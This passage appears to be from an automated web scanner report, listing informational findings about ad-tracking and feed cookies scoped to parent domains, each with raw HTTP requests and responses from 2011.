xWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=J7x2bDuUKEtvib99_cZ-goPkzf6fIWdT9qM0aQWLwdOF_EilXRDpaVZoH21hYpbQ_z8HPYaM65wmqlJy40vBadBs7ec_hKVpWmzGgpiPlJRmhHY91Od4ptjK1iXzWgf7YM9JcWUydwSjnVf6q-FUanruxK4uefgXP7ZdyVROLv_EX4Zs9uuxOorR1jFrO1zcG_gdEQnib-clYfloOv_2lwqppjPBjFKyV8EeX_PmZ3toWeNBBG1YXENBRnS36DX-DH4SpQ7ShuV2d-NYFVtIGU4rg9s3nC4Mr4n244WBenfBQvgZwq9RRhbU_X2h51k_lFNMYeW93reJZIhHwSGf_H-AGq493sR64bEOrwMdlInQ3_hhak8rBdJ58aGNvtefEliM6K91jkZgRPytvxuPwribim3vmqyyNBTkZPK5bgtSa2VlsCnfIOdALl2CJqdkZhmGNuRHWDVgBcQKTDDI-C9HqiYDbJbNB9CX-bFduf_4wzqymhlU8NzniYzSnw97-nSMv1Ur7Z33pZwY9l2NMakidhN29b9Ofr7Bq7FDEQcPY-IpYg2t0xP7y14kXbvwzIk6XrRVIeLEk3n3FI0YFZVmhyfxvd90ZjpkD7U8TStLwdQl5LwjuZaLFoSxXtBK8KH60FpkU0G2gUnrflL9VTpu1O3vB60oRbvgxyp7z_Z0Gj8TYsZ0VCNltzB03G6c72uqjTU8jXqaUrgLcC4GUHIhMbOsM46CGu-xrQeqV53rZ5hJ1gzXgXpkNzuBwm3r-S_dMVUuhga3jszadxpL1ZqjTPRel5cEUgvdDJ3MOq3cc9BWe8XEPGAMQ9qkOUlqGfVpydvdh9VRg3TWc9nfe02J4PEhStINh_XK4qMZTFuGGyT7t6QcnkTiZaHi0iLCxy1cRxFPUGLCYHB__cvofgze4Dc1hJxT0qQAT0ZLxqdw-zylhvnUb3_v8KQ_u7h4C3cz5441iPfVZlnGI8FgjEdPX9Io8AztWyBMT2jbhtEhnytyITpkI7EMsodby4wJb3KWxiTvNz649iNqdkmppJ9Y2MrznAPiuM_iUf3CtQcvajZWDQ_aU2sdChXIJdmqhSsp4k98i5kptq3O_jJiG387HHM8N-mnxbLV49hpZl7HB6tKRWD9ta5CqqOGJxje1FD94IKAWvmqSeRURV7BZkq-DriWTk4W8Lg253t80LGdVztl5fhi82YM7eGVbuMBszjs_o8TR8fdMx9KU2g8RAyPuIMJlWM10E2GhmQFiSiVitV2wOqxS_4UWGiszU0GXyRCXufbfkPvN1ZTjv5plHd9vB9RwBmjkvSCLTbIi-zSd1IhObGWnMROa1bnsqaUNCdVavrtKz0RY8zOpsBdGICyM1qCRBVjoHmmGFhLVc8

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sun, 23-Oct-2011 18:46:24 GMT; Path=/
Set-Cookie: pf=RJBxLMKoVxCS-qMwX-xMpY1mH9Pu7p9NFtiFJSMdiybXTSH-IWQ6DNANSP75aijjdO23HSD7pyKr7DJ1joDUWM468DdJSOgljJ2xbi_l9u9ZxeTKQ54b6bMN5_hAEHvCC85A780w7bxirRefrrfdUQ5MGbQVS-ANev-_kQHmfkNQ6smQv5og4PkHqE3X_RQkCakAc4d8keEQlchNYzoHfZxtEyIFIozc8UfkJOOkQ-y5dEvDEzVGTQvjJ5k4ByfPCozyJ9TkdmXRA1qxfrSsssRSltQ60aZH2ijZovuR0NiMGHVgt7mgGsocub0zzJ5vfevB_hMBPVMHU4yqxUoa7563WNzfYatz3anBXP8vJNV8OIDJ2_d_TikgprD9eTEY9Svij-enRxMzjoTCiSuJJ5cQvQaai4KELW1OcRDj42OoDHZ35qYjbMJGiS7H6QzBEMEL6z9O7ZZ-dVK-LB9x5eVCCbLDRgQ9SZzWAlO-DzghO5M4qVwWOnD0WVFMRlpVb5YZ-H7HIhkf4JnbunSJ5rDfQltqIDPsW-Nw3VdjWZJ43hQ9SJBXAnXR6ZsvuRwrGwTDhUn95yBj7Q4uDzGAkdX_RaPPovuNmnIWrbdeEmglk0GxXPQeX3Dvmx1yQF6VY5FoqJUdFAx0sVTWl-uIoOMbxQE4RsOHkMPB4p-MP-YY668t6y8gl90k0_Ch-iwZo3Fk_tXEG6JfREHm48zIWZDeK9bfnUMOwxDvr7BzsPLnVwKnaDWLDf3zo8tYr4j36IMQ3-ltbShuD8pnWtQRyLGu8QSpcwiIyXCmH-UzJwp7ufJ8BSOSuEt0C5fhAn-tyQ5fl83GHPtUMgYlHGpHnWPD7H-4YnnKAJFDDILVU8WpcrIOaIktJDZ05dwOs59t8PVekksAdPxiQnJQKxaKphBHmnt_RBJIUtMr7Z0JF2Qi2OYxHAtrLlIf7S1cmEc1eFqcfW_diSuZqY6P-rN3jb6npanG9dmmctHHtv2CeESdXVKpwAKy70JR2CGQfW1Gms-OAvsUfF4QOe8a5AlmNZMWfQJZnus8Ac3RXH4pap39MPaAnleHet5XiG5PWa8YmVlR5RbNDS9j9hPCX3_q_Y_T31T07l7J2GhmoSGChftmOIC8Fyb1ISAB9loHZvlI9e1rshh1EbZFQ-ZFDp05I3ntk83ew_643lAS3ZwiuiCgmkuCbN4ZbhzIzGj9Wcrgz0jyp-OYSl6V2ZcRa3_qs1IgC5bdvkso5nn_Gn1b8YIkiGw_ITVrv4NZI32a2OMBC7PHeZlRh6cpoM8iSZGGpI8Ir0oB475leuQMcic84O9310UIlDzL0OkBq79wqGBg-sXLp-ClVLZTYHBhcMzoqsqCWV6kP7CTcP_vuQ0mXIfXZqJmKSW9mhtROAv63-Z_urduab59q8XAzaNdD2vW8t9OsswEbC4jBmCeR4IID_Ipp46PLUIFwvIzNsNMQb2FFoyIxxAqD2pYwL35Ly1yK_rac_irqC2rJv3tD2-bR9I; Domain=.turn.com; Expires=Sun, 23-Oct-2011 18:46:24 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1081801&t=2
Content-Length: 0
Date: Tue, 26 Apr 2011 18:46:24 GMT


13.67. http://realestate.msn.us.intellitxt.com/al.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /al.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 38
Date: Tue, 26 Apr 2011 18:46:36 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1();}catch(e){}

13.68. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=20029 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGqngA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:45:47 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGqngA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:45:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:45:47 GMT
Age: 0
Connection: keep-alive
Content-Length: 11085

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

13.69. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.feedsportal.com
Path:   /c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm HTTP/1.1
Host: rss.feedsportal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 OK
Server: FeedsPortal
Set-Cookie: MF2=1afpctay3oghk; domain=.feedsportal.com; expires=Thu, 25-Apr-2013 21:48:56 GMT; path=/
Location: http://da.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/ia1.htm
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 0
Date: Tue, 26 Apr 2011 21:48:55 GMT
Connection: close


13.70. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.202&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:38095-53051:s:50741-63737:mac
goog-phish-shavar;a:158725-169966:s:78455-82690:mac
goog-badbinurl-shavar;a:137-2711:s:61-2593:mac
goog-badbin-digestvar;a:19-2082:s:3-536:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=eff0a0789d228775:TM=1318938900:LM=1318938900:S=6cRJ1AFSfCanDMX2; expires=Thu, 17-Oct-2013 11:55:00 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 18 Oct 2011 11:55:00 GMT
Server: Chunked Update Server
Content-Length: 1931
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Tue, 18 Oct 2011 11:55:00 GMT
Cache-Control: private

m:AIRkvuGakBT0DPCEphoLRvh-xb8=
n:1806
i:goog-badbin-digestvar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQARiYBCCcBCoFHAIAAAEyBRgCAAAP,W7NzU6Z1ARemSmCM1_K-7qwGdC8=

...[SNIP]...

13.71. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=40657&partnerID=9&clientID=1603&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=6591672650538.385?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuZYEMzFzHE0h4uLY889RoF5y16/ZQEKTDfmYuE42M0IZJ7LATI7O5iBzNM5QGKiCpDf9J8JSB46AiKb/zMBALWhEtg="

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:38:05 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uLY889RoF5y16/ZQEKTDfmYuE42M0IZJ7LARKnc4D8zg5mIHOiCpDZ9J8JSB46AiIv7gWRzf+ZAC1dFH4=";Version=1;Path=/;Domain=invitemedia.com;Expires=Wed, 25-Apr-2012 18:38:05 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1147351&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


13.72. http://tags.bluekai.com/site/1654  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/1654

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/1654?ret=pp&_bkt=3&_bks=RMDhBtDtjMQ= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bko=; bkp1=; bku=exy99JnggW62duLG; bkw5=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KSKrBAU9WUoOKz=; bk=ZJ461LV5c/sVIHOf; bkc=KJh5pfWn9VWRhdc4KfMrlalhe2psjMORvsPl0ARjdx1V1T7q5uVEw6Ybx+AAQd29ZSyVIfc/IbMUKDhF7dGIwzXqV/OrYWErNC199rkYWz05jmhks+CLQnG4KQZDLIEvZJ+b8P6vtnKOhVw+S5O9qkMzNYr4cK90apM+yLXIXg1cjr3PUKkVE3eAhff7yD02LZWYPlkFzhJftmzKdJ7ZkRd04dRHZB8VUNz+qr3PEK7eMnLfT3TBrmkP5ZpQkHc1Azf2rIXBaSCiPx==; bkst=KJyPMEar9MWx9nKQYk0Pckcx7ZEFg55tuR/WamiWe+J7nqrCHO0/ebHcKxS/OGZKQCdyOQGKAejcmpwu+mebO+YcDWx6EeslEiu7aW6ru7wrG6xU7uJVh48h7nqQ+ylx9pIqqzmXBmLhEgf+h8n3DRVP8lD3Hb+3Iw7UwE5+NQaTOfH/CVmkwSJNhvM5d7kG5ezeb1YZMn/jfsCH42UZ82EyKdjSVsRMCGpuZnHuu7yvZotxIJ9TIBFkBw6cDtx0Gy==

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 18:46:33 GMT
Set-Cookie: bklc=4db71309; expires=Thu, 28-Apr-2011 18:46:33 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=pAXpfXV5c/sVIHOf; expires=Sun, 23-Oct-2011 18:46:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWRhdc4XK5tntbHlzjZ1aQGjUKPeHZ29zF5a9ZfkWhKQvHz5E4oe+bO1kA+5ih0c7UzI8Cm7Xfl2epcNGOIspeugiD9tBnNmcz7T7LrfpH5TJcjd8yFQJkb8UD1zO0QB+NSRjHu8wvRZlokByGzVLe3rqBYY/a1IyHBF4njOY8nQjmfdzTMFloQokT8/2l1YCu7FrX81amFgOF9PKfqZwQKt+0ew2BfjDdInIWOL2FZ863zZlokxd3TTmbmrvLeqM3PpxEyEQgZCXR57wzOUcPGF9==; expires=Sun, 23-Oct-2011 18:46:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 27-Apr-2011 18:46:33 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.73. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=4561iuf9g3q501317&tz=5&ref=http%3A%2F%2Fwww.aptm.phoenix.edu%2F%3Fcreative_desc%3D20DR_Button_Orange_728x90_F9_Tag_swf%26provider%3DMSN%26keyword%3Dmsn_careers_728x90_425006%26user3%3D1%26unit%3Ddir%26channel%3Dbanr%26initiative%3Dgen%26mktg_prog%3Dgen%26placement%3Ddsply%26version%3D728x90%26classification%3Ddir_dsply%26destination%3Daptm%26distribution%3Dplcmt_targ%26user1%3Dcpm%26user2%3Ddr%26creative_id%3D38954353%26pvp_campaign%3D14610_0957_9_95%26cm_mmc%3Ddir-_-banr-_-MSN-_-gen%26cm_mmca1%3Dgen%26cm_mmca2%3Ddsply%26cm_mmca3%3D38954353%26cm_mmca4%3D20DR_Button_Orange_728x90_F9_Tag_swf%26cm_mmca5%3D728x90%26cm_mmca6%3Ddir_dsply%26cm_mmca7%3Dmsn_careers_728x90_425006%26cm_mmca8%3Daptm%26cm_mmca9%3Dplcmt_targ%26cm_mmca11%3Dcpm%26cm_mmca12%3Ddr%26cm_mmca13%3D1&page=http%3A%2F%2Ffls.doubleclick.net%2Factivityi%3Bsrc%3D1676624%3Btype%3Dcount339%3Bcat%3Dlandi852%3Bu2%3D14610_0957_9_95%3Bu4%3D38954353%3Bu5%3D%3Bu6%3D%3Bu7%3D%3Bord%3D1%3Bnum%3D5058492012321.949%3F&uuid=389E4AAF-0A51-4C2B-B96D-B96D82DE5465&rnd=1970267086 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=923F0BAD-ECCD-4A46-B765-0D3484A87F4C

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Tue, 26 Apr 2011 18:46:41 GMT
Connection: close
